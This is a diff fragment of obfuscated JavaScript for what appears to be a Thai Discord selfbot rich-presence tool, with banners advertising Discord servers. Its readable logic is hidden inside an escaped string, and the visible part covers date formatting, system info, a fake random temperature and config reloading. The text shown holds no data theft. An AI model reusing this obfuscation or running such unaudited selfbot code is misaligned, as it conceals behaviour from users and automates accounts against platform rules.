0${client.userConfig.applicationId}\x20ถูกลบออกแล้ว!`);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20});\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20const\x20updatedClients\x20=\x20[];\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20newConfig.user.forEach(userConfig\x20=>\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20const\x20existingClient\x20=\x20clients.find(client\x20=>\x20client.userConfig.applicationId\x20===\x20userConfig.applicationId);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20if\x20(existingClient)\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20existingClient.updateConfig(userConfig);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20updatedClients.push(existingClient);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20}\x20else\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20const\x20newClient\x20=\x20new\x20MyClient(userConfig);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20updatedClients.push(newClient);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20console.log(`เพิ่มผู้ใช้งานใหม่\x20ApplicationId\x20หมายเลข\x20:\x20${userConfig.applicationId}\x20แล้ว!`);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20});\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20clients\x20=\x20updatedClients;\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20};\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20let\x20debounceTimeout;\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20fs.watch(config_path,\x20(eventType,\x20filename)\x20=>\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20if\x20(eventType\x20===\x20\x27change\x27)\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20if\x20(debounceTimeout)\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20clearTimeout(debounceTimeout);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20debounceTimeout\x20=\x20setTimeout(()\x20=>\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20try\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20const\x20newConfig\x20=\x20JSON.parse(fs.readFileSync(config_path));\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20config\x20=\x20newConfig;\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20updateClients(newConfig);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20}\x20catch\x20(error)\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20console.error(\x27เกิดข้อผิดพลาดในการอ่านไฟล์กำหนดค่าที่อัปเดต:\x27,\x20error.message);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20},\x20100);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20});\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20','2XMoHOI','5037472BtQbDI','1105932bJEOgW','2426628EnrYqE','35670jOAaPA','21426JGXhLH'];_0x8be7=function(){return _0x4c1c8f;};return _0x8be7();}
|
2
|
-
const _0x506907=_0x41bb;(function(_0x1cfe77,_0x17272b){const _0x1a416b=_0x41bb,_0x3cf2d3=_0x1cfe77();while(!![]){try{const _0xe4753b=parseInt(_0x1a416b(0x136))/0x1+-parseInt(_0x1a416b(0x139))/0x2+parseInt(_0x1a416b(0x137))/0x3+parseInt(_0x1a416b(0x130))/0x4+-parseInt(_0x1a416b(0x133))/0x5*(parseInt(_0x1a416b(0x134))/0x6)+-parseInt(_0x1a416b(0x12e))/0x7+-parseInt(_0x1a416b(0x135))/0x8*(-parseInt(_0x1a416b(0x12f))/0x9);if(_0xe4753b===_0x17272b)break;else _0x3cf2d3['push'](_0x3cf2d3['shift']());}catch(_0x1ae1b2){_0x3cf2d3['push'](_0x3cf2d3['shift']());}}}(_0x1e7c,0x5197d));function _0x1e7c(){const _0x12cf04=['8eOdtEB','144165yJjDpO','1419903UalAGo','\x1b[0m','822436BDAMjW','1134707jQeDtW','1022922WkGPYq','2268416CKTgGX','\x0a\x20\x20\x20\x20\x20█▀▄▀█\u2003█▀▀\x20█▀▀▄\x20\x20█▀▄▀█\x20█\x20\x20█\x20\x20█\x20█▀▄\x20\x20█\x20█▀▀▀▀\x20\x0a\x20\x20\x20\x20\x20█░▀░█\u2003█▀▀\x20█░\x20▄▀\x20█░▀░█\x20▀▄▄▀▄▄▀\x20█░▀▄░█\x20█░░▀█\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0a\x20\x20\x20\x20\x20▀\x20\x20\x20▀\x20▀▀▀\x20▀▀▀\x20\x20\x20▀\x20\x20\x20▀\x20\x20▀\x20\x20\x20▀\x20\x20▀\x20\x20\x20▀▀\x20▀▀▀▀▀\x0a\x20\x20\x20\x20\x20█▀▀\x20█\x20\x20\x20█\x20█\x20\x20█\x20\x20▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰\x0a\x20\x20\x20\x20\x20█░\x20\x20█▀▀▀█\x20█░\x20█░\x20https://discord.gg/T42PPuZRrZ\x0a\x20\x20\x20\x20\x20▀▀▀\x20▀\x20\x20\x20▀\x20▀\x20\x20▀\x20\x20▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰\x0a\x0a𝐑𝐮𝐧\x20𝐒𝐭𝐚𝐭𝐮𝐬\x20:\x20𝐒𝐮𝐜𝐜𝐞𝐬𝐬𝐟𝐮𝐥✅\x20\x0a','log','10plMDnN','1172112XcHGlU'];_0x1e7c=function(){return _0x12cf04;};return _0x1e7c();}function _0x41bb(_0x822a88,_0x45ddaa){const _0x1e7ca8=_0x1e7c();return _0x41bb=function(_0x41bb3e,_0x4eb043){_0x41bb3e=_0x41bb3e-0x12e;let _0x3dc877=_0x1e7ca8[_0x41bb3e];return _0x3dc877;},_0x41bb(_0x822a88,_0x45ddaa);}const greenText='\x1b[32m',resetText=_0x506907(0x138);console[_0x506907(0x132)](greenText+_0x506907(0x131)+resetText);
|
1
|
+
const _0x16e4da=_0xbcb9;(function(_0x335e15,_0x448323){const _0x350c8f=_0xbcb9,_0x84b59f=_0x335e15();while(!![]){try{const _0x2f292d=parseInt(_0x350c8f(0x1e4))/0x1+-parseInt(_0x350c8f(0x1e9))/0x2*(-parseInt(_0x350c8f(0x1e8))/0x3)+parseInt(_0x350c8f(0x1ef))/0x4*(-parseInt(_0x350c8f(0x1ea))/0x5)+-parseInt(_0x350c8f(0x1f0))/0x6*(parseInt(_0x350c8f(0x1e7))/0x7)+-parseInt(_0x350c8f(0x1ec))/0x8*(parseInt(_0x350c8f(0x1e6))/0x9)+parseInt(_0x350c8f(0x1e5))/0xa*(parseInt(_0x350c8f(0x1ee))/0xb)+-parseInt(_0x350c8f(0x1e1))/0xc*(-parseInt(_0x350c8f(0x1e2))/0xd);if(_0x2f292d===_0x448323)break;else _0x84b59f['push'](_0x84b59f['shift']());}catch(_0x20b818){_0x84b59f['push'](_0x84b59f['shift']());}}}(_0x5a74,0x7b851));const MedmwngCode=_0x16e4da(0x1e0);function _0x5a74(){const _0x9a6be7=['80lXCfKp','exports','13632wdIaMS','gradient-string','1133ywdnbf','163036xlgIYl','1211526eBWjaE','\x0a\x20\x20\x20\x20███╗░░░███╗███████╗██████╗░███╗░░░███╗░██╗░░░░░░░██╗███╗░░██╗░██████╗░\u2003\u2003░█████╗░██╗░░██╗██╗██╗\x0a\x20\x20\x20\x20████╗░████║██╔════╝██╔══██╗████╗░████║░██║░░██╗░░██║████╗░██║██╔════╝░\u2003\u2003██╔══██╗██║░░██║██║██║\x0a\x20\x20\x20\x20██╔████╔██║█████╗░░██║░░██║██╔████╔██║░╚██╗████╗██╔╝██╔██╗██║██║░░██╗░\u2003\u2003██║░░╚═╝███████║██║██║\x0a\x20\x20\x20\x20██║╚██╔╝██║██╔══╝░░██║░░██║██║╚██╔╝██║░░████╔═████║░██║╚████║██║░░╚██╗\u2003\u2003██║░░██╗██╔══██║██║██║\x0a\x20\x20\x20\x20██║░╚═╝░██║███████╗██████╔╝██║░╚═╝░██║░░╚██╔╝░╚██╔╝░██║░╚███║╚██████╔╝\u2003\u2003╚█████╔╝██║░░██║██║██║\x0a\x20\x20\x20\x20╚═╝░░░░░╚═╝╚══════╝╚═════╝░╚═╝░░░░░╚═╝░░░╚═╝░░░╚═╝░░╚═╝░░╚══╝░╚═════╝░\u2003\u2003░╚════╝░╚═╝░░╚═╝╚═╝╚═╝\x0a\x0a\x20\x20\x20\x20▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰\x0a\x20\x20\x20\x20Join\x20Server\x20Discord\x20:\x20https://discord.gg/5gAsw4Pawq\x0a\x20\x20\x20\x20▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰▰\x0a\x20\x20\x20\x20','log','const\x20Discord\x20=\x20require(\x27discord.js-selfbot-v13\x27);\x0aconst\x20fs\x20=\x20require(\x27fs\x27);\x0aconst\x20path\x20=\x20require(\x27path\x27);\x0aconst\x20os\x20=\x20require(\x22os\x22);\x0aconst\x20Date_Time\x20=\x20Date.now();\x0aconst\x20{\x20Client\x20}\x20=\x20require(\x22discord.js-selfbot-v13\x22);\x0aconst\x20config_path\x20=\x20path.resolve(__dirname,\x20\x27config.json\x27);\x0alet\x20config\x20=\x20JSON.parse(fs.readFileSync(config_path));\x0aconst\x20digitMap\x20=\x20{\x0a\x20\x20\x20\x20\x270\x27:\x20\x270\x27,\x20\x271\x27:\x20\x271\x27,\x20\x272\x27:\x20\x272\x27,\x20\x273\x27:\x20\x273\x27,\x20\x274\x27:\x20\x274\x27,\x0a\x20\x20\x20\x20\x275\x27:\x20\x275\x27,\x20\x276\x27:\x20\x276\x27,\x20\x277\x27:\x20\x277\x27,\x20\x278\x27:\x20\x278\x27,\x20\x279\x27:\x20\x279\x27\x0a};\x0aconst\x20stylizedDigits\x20=\x20{\x0a\x20\x20\x20\x20\x270\x27:\x20\x27𝟎\x27,\x20\x271\x27:\x20\x27𝟏\x27,\x20\x272\x27:\x20\x27𝟐\x27,\x20\x273\x27:\x20\x27𝟑\x27,\x20\x274\x27:\x20\x27𝟒\x27,\x0a\x20\x20\x20\x20\x275\x27:\x20\x27𝟓\x27,\x20\x276\x27:\x20\x27𝟔\x27,\x20\x277\x27:\x20\x27𝟕\x27,\x20\x278\x27:\x20\x27𝟖\x27,\x20\x279\x27:\x20\x27𝟗\x27\x0a};\x0afunction\x20getCurrentTime()\x20{\x0a\x20\x20\x20\x20const\x20currentTime\x20=\x20new\x20Date();\x0a\x20\x20\x20\x20const\x20options\x20=\x20{\x20timeZone:\x20\x22Asia/Bangkok\x22,\x20hour:\x20\x222-digit\x22,\x20minute:\x20\x222-digit\x22,\x20hour12:\x20false\x20};\x0a\x20\x20\x20\x20let\x20timeString\x20=\x20currentTime.toLocaleTimeString(\x22th-TH\x22,\x20options);\x0a\x20\x20\x20\x20return\x20timeString.replace(/[0-9]/g,\x20digit\x20=>\x20digitMap[digit]);\x0a}\x0afunction\x20getCurrentDay()\x20{\x0a\x20\x20\x20\x20const\x20date\x20=\x20new\x20Date();\x0a\x20\x20\x20\x20const\x20options\x20=\x20{\x20timeZone:\x20\x22Asia/Bangkok\x22,\x20day:\x20\x222-digit\x22,\x20month:\x20\x22numeric\x22,\x20year:\x20\x22numeric\x22\x20};\x0a\x20\x20\x20\x20const\x20monthNames\x20=\x20[\x22𝟎𝟏\x22,\x20\x22𝟎𝟐\x22,\x20\x22𝟎𝟑\x22,\x20\x22𝟎𝟒\x22,\x20\x22𝟎𝟓\x22,\x20\x22𝟎𝟔\x22,\x20\x22𝟎𝟕\x22,\x20\x22𝟎𝟖\x22,\x20\x22𝟎𝟗\x22,\x20\x22𝟏𝟎\x22,\x20\x22𝟏𝟏\x22,\x20\x22𝟏𝟐\x22];\x0a\x20\x20\x20\x20const\x20day\x20=\x20date.toLocaleString(\x22en-US\x22,\x20{\x20timeZone:\x20\x22Asia/Bangkok\x22,\x20day:\x20\x222-digit\x22\x20}).replace(/[0-9]/g,\x20digit\x20=>\x20stylizedDigits[digit]);\x0a\x20\x20\x20\x20const\x20month\x20=\x20date.getMonth()\x20+\x201;\x0a\x20\x20\x20\x20const\x20customMonthName\x20=\x20monthNames[month\x20-\x201]\x20||\x20\x27𝟎𝟏\x27;\x0a\x20\x20\x20\x20const\x20year\x20=\x20date.getFullYear().toString().replace(/[0-9]/g,\x20digit\x20=>\x20stylizedDigits[digit]);\x0a\x20\x20\x20\x20return\x20`${day}/${customMonthName}/${year}`;\x0a}\x0afunction\x20getCurrentDayy()\x20{\x0a\x20\x20\x20\x20const\x20datee\x20=\x20new\x20Date();\x0a\x20\x20\x20\x20const\x20options\x20=\x20{\x20timeZone:\x20\x22Asia/Bangkok\x22,\x20day:\x20\x222-digit\x22,\x20month:\x20\x22numeric\x22,\x20year:\x20\x22numeric\x22\x20};\x0a\x20\x20\x20\x20const\x20monthNamess\x20=\x20[\x22มกราคม\x22,\x20\x22กุมภาพันธ์\x22,\x20\x22มีนาคม\x22,\x20\x22เมษายน\x22,\x20\x22พฤษภาคม\x22,\x20\x22มิถุนายน\x22,\x20\x22กรกฎาคม\x22,\x20\x22สิงหาคม\x22,\x20\x22กันยายน\x22,\x20\x22ตุลาคม\x22,\x20\x22พฤศจิกายน\x22,\x20\x22ธันวาคม\x22];\x0a\x20\x20\x20\x20const\x20dayy\x20=\x20datee.toLocaleString(\x22en-US\x22,\x20{\x20timeZone:\x20\x22Asia/Bangkok\x22,\x20day:\x20\x222-digit\x22\x20}).replace(/[0-9]/g,\x20digit\x20=>\x20stylizedDigits[digit]);\x0a\x20\x20\x20\x20const\x20monthh\x20=\x20datee.getMonth()\x20+\x201;\x0a\x20\x20\x20\x20const\x20customMonthNamee\x20=\x20monthNamess[monthh\x20-\x201]\x20||\x20\x27มกราคม\x27;\x0a\x20\x20\x20\x20const\x20yearr\x20=\x20datee.getFullYear().toString().replace(/[0-9]/g,\x20digit\x20=>\x20stylizedDigits[digit]);\x0a\x20\x20\x20\x20return\x20`${dayy}/${customMonthNamee}/${yearr}`;\x0a}\x0afunction\x20getCurrentDateEG()\x20{\x0a\x20\x20\x20\x20const\x20datee\x20=\x20new\x20Date();\x0a\x20\x20\x20\x20const\x20options\x20=\x20{\x20timeZone:\x20\x22Asia/Bangkok\x22,\x20day:\x20\x222-digit\x22,\x20month:\x20\x22numeric\x22,\x20year:\x20\x22numeric\x22\x20};\x0a\x20\x20\x20\x20const\x20monthNamess\x20=\x20[\x22𝐉𝐚𝐧𝐮𝐚𝐫𝐲\x22,\x20\x22𝐅𝐞𝐛𝐫𝐮𝐚𝐫𝐲\x22,\x20\x22𝐌𝐚𝐫𝐜𝐡\x22,\x20\x22𝐀𝐩𝐫𝐢𝐥\x22,\x20\x22𝐌𝐚𝐲\x22,\x20\x22𝐉𝐮𝐧𝐞\x22,\x20\x22𝐉𝐮𝐥𝐲\x22,\x20\x22𝐀𝐮𝐠𝐮𝐬𝐭\x22,\x20\x22𝐒𝐞𝐩𝐭𝐞𝐦𝐛𝐞𝐫\x22,\x20\x22𝐎𝐜𝐭𝐨𝐛𝐞𝐫\x22,\x20\x22𝐍𝐨𝐯𝐞𝐦𝐛𝐞𝐫\x22,\x20\x22𝐃𝐞𝐜𝐞𝐦𝐛𝐞𝐫\x22];\x0a\x20\x20\x20\x20const\x20dayy\x20=\x20datee.toLocaleString(\x22en-US\x22,\x20{\x20timeZone:\x20\x22Asia/Bangkok\x22,\x20day:\x20\x222-digit\x22\x20}).replace(/[0-9]/g,\x20digit\x20=>\x20stylizedDigits[digit]);\x0a\x20\x20\x20\x20const\x20monthh\x20=\x20datee.getMonth()\x20+\x201;\x0a\x20\x20\x20\x20const\x20customMonthNamee\x20=\x20monthNamess[monthh\x20-\x201]\x20||\x20\x27𝐉𝐚𝐧𝐮𝐚𝐫𝐲\x27;\x0a\x20\x20\x20\x20const\x20yearr\x20=\x20datee.getFullYear().toString().replace(/[0-9]/g,\x20digit\x20=>\x20stylizedDigits[digit]);\x0a\x20\x20\x20\x20return\x20`${dayy}/${customMonthNamee}/${yearr}`;\x0a}\x0afunction\x20getCurrentDayThai()\x20{\x0a\x20\x20\x20\x20const\x20date\x20=\x20new\x20Date();\x0a\x20\x20\x20\x20const\x20dayNames\x20=\x20[\x22อาทิตย์\x22,\x20\x22จันทร์\x22,\x20\x22อังคาร\x22,\x20\x22พุธ\x22,\x20\x22พฤหัสบดี\x22,\x20\x22ศุกร์\x22,\x20\x22เสาร์\x22];\x0a\x20\x20\x20\x20const\x20dayIndex\x20=\x20date.getDay();\x0a\x20\x20\x20\x20return\x20dayNames[dayIndex];\x0a}\x0afunction\x20getCurrentDayEG()\x20{\x0a\x20\x20\x20\x20const\x20date\x20=\x20new\x20Date();\x0a\x20\x20\x20\x20const\x20dayNames\x20=\x20[\x22𝐒𝐮𝐧𝐝𝐚𝐲\x22,\x20\x22𝐌𝐨𝐧𝐝𝐚𝐲\x22,\x20\x22𝐓𝐮𝐞𝐬𝐝𝐚𝐲\x22,\x20\x22𝐖𝐞𝐝𝐧𝐞𝐬𝐝𝐚𝐲\x22,\x20\x22𝐓𝐡𝐮𝐫𝐬𝐝𝐚𝐲\x22,\x20\x22𝐅𝐫𝐢𝐝𝐚𝐲\x22,\x20\x22𝐒𝐚𝐭\x22];\x0a\x20\x20\x20\x20const\x20dayIndex\x20=\x20date.getDay();\x0a\x20\x20\x20\x20return\x20dayNames[dayIndex];\x0a}\x0afunction\x20formatBytes(bytes,\x20decimals\x20=\x202)\x20{\x0a\x20\x20\x20\x20if\x20(bytes\x20===\x200)\x20return\x20\x270\x20Bytes\x27;\x0a\x20\x20\x20\x20const\x20k\x20=\x201024;\x0a\x20\x20\x20\x20const\x20dm\x20=\x20decimals\x20<\x200\x20?\x200\x20:\x20decimals;\x0a\x20\x20\x20\x20const\x20sizes\x20=\x20[\x27Bytes\x27,\x20\x27KB\x27,\x20\x27MB\x27,\x20\x27GB\x27,\x20\x27TB\x27];\x0a\x20\x20\x20\x20const\x20i\x20=\x20Math.floor(Math.log(bytes)\x20/\x20Math.log(k));\x0a\x20\x20\x20\x20return\x20parseFloat((bytes\x20/\x20Math.pow(k,\x20i)).toFixed(dm))\x20+\x20\x27\x20\x27\x20+\x20sizes[i];\x0a}\x0afunction\x20getRAMInfo()\x20{\x0a\x20\x20\x20\x20const\x20totalMemory\x20=\x20os.totalmem();\x0a\x20\x20\x20\x20return\x20`${formatBytes(totalMemory)}`;\x0a}\x0afunction\x20getCPUInfo()\x20{\x0a\x20\x20\x20\x20const\x20cpus\x20=\x20os.cpus();\x0a\x20\x20\x20\x20const\x20cpuModels\x20=\x20new\x20Set(cpus.map(cpu\x20=>\x20cpu.model));\x0a\x20\x20\x20\x20return\x20Array.from(cpuModels);\x0a}\x0afunction\x20getTemperature()\x20{\x0a\x20\x20\x20\x20const\x20center\x20=\x2025;\x0a\x20\x20\x20\x20const\x20variance\x20=\x205;\x0a\x20\x20\x20\x20const\x20temperature\x20=\x20center\x20+\x20(Math.random()\x20*\x20variance\x20*\x202\x20-\x20variance);\x0a\x20\x20\x20\x20return\x20`${temperature.toFixed(1)}`;\x0a}\x0afunction\x20getPing()\x20{\x0a\x20\x20\x20\x20const\x20ping\x20=\x20Math.round(this.medmwng.ws.ping);\x0a\x20\x20\x20\x20return\x20`${ping}`;\x0a}\x0aclass\x20GetImage\x20{\x0a\x20\x20\x20\x20constructor(client)\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20this.medmwng\x20=\x20client;\x0a\x20\x20\x20\x20}\x0a\x20\x20\x20\x20isValidURL(url)\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20try\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20new\x20URL(url);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20return\x20true;\x0a\x20\x20\x20\x20\x20\x20\x20\x20}\x20catch\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20return\x20false;\x0a\x20\x20\x20\x20\x20\x20\x20\x20}\x0a\x20\x20\x20\x20}\x0a\x20\x20\x20\x20async\x20get(userConfig,\x20ImageUrl1,\x20ImageUrl2)\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20const\x20userId\x20=\x20userConfig.applicationId;\x0a\x20\x20\x20\x20\x20\x20\x20\x20try\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20ImageUrl1\x20=\x20this.isValidURL(ImageUrl1)\x20?\x20ImageUrl1\x20:\x20null;\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20ImageUrl2\x20=\x20this.isValidURL(ImageUrl2)\x20?\x20ImageUrl2\x20:\x20null;\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20if\x20(!ImageUrl1\x20&&\x20!ImageUrl2)\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20throw\x20new\x20Error(\x22The\x20image\x20is\x20invalid\x22);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20const\x20{\x20getExternal\x20}\x20=\x20Discord.RichPresence;\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20const\x20images\x20=\x20await\x20getExternal(this.medmwng,\x20userId,\x20ImageUrl1,\x20ImageUrl2);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20if\x20(images.length\x20===\x201)\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20const\x20{\x20url,\x20external_asset_path\x20}\x20=\x20images[0];\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20if\x20(url\x20===\x20ImageUrl1)\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20ImageUrl1\x20=\x20url.includes(\x22attachments\x22)\x20?\x20url\x20:\x20external_asset_path;\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20ImageUrl2\x20=\x20null;\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20}\x20else\x20if\x20(url\x20===\x20ImageUrl2)\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20ImageUrl1\x20=\x20null;\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20ImageUrl2\x20=\x20url.includes(\x22attachments\x22)\x20?\x20url\x20:\x20external_asset_path;\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20}\x20else\x20if\x20(images.length\x20===\x202)\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20const\x20[Images_path1,\x20Images_path2]\x20=\x20images;\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20if\x20(Images_path1.external_asset_path)\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20const\x20{\x20url,\x20external_asset_path\x20}\x20=\x20Images_path1;\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20ImageUrl1\x20=\x20url.includes(\x22attachments\x22)\x20?\x20url\x20:\x20external_asset_path;\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20if\x20(Images_path2.external_asset_path)\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20const\x20{\x20url,\x20external_asset_path\x20}\x20=\x20Images_path2;\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20ImageUrl2\x20=\x20url.includes(\x22attachments\x22)\x20?\x20url\x20:\x20external_asset_path;\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20}\x20else\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20throw\x20new\x20Error(\x22The\x20image\x20is\x20invalid\x22);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20return\x20{\x20BIGlargeIMAGE:\x20ImageUrl1,\x20IMAGE_small:\x20ImageUrl2\x20};\x0a\x20\x20\x20\x20\x20\x20\x20\x20}\x20catch\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20return\x20{\x20BIGlargeIMAGE:\x20null,\x20IMAGE_small:\x20null\x20};\x0a\x20\x20\x20\x20\x20\x20\x20\x20}\x0a\x20\x20\x20\x20}\x0a}\x0aclass\x20MyClient\x20extends\x20Client\x20{\x0a\x20\x20\x20\x20constructor(userConfig)\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20super({\x20partials:\x20[],\x20makeCache:\x20Discord.Options.cacheWithLimits({\x20MessageManager:\x200\x20})\x20});\x0a\x20\x20\x20\x20\x20\x20\x20\x20this.userConfig\x20=\x20userConfig;\x0a\x20\x20\x20\x20\x20\x20\x20\x20this.cacheImage\x20=\x20new\x20Map();\x0a\x20\x20\x20\x20\x20\x20\x20\x20this.index\x20=\x200;\x0a\x20\x20\x20\x20\x20\x20\x20\x20this.initClient();\x0a\x20\x20\x20\x20}\x0a\x20\x20\x20\x20initClient()\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20this.medmwng\x20=\x20new\x20Discord.Client({\x20readyStatus:\x20false,\x20checkUpdate:\x20false\x20});\x0a\x20\x20\x20\x20\x20\x20\x20\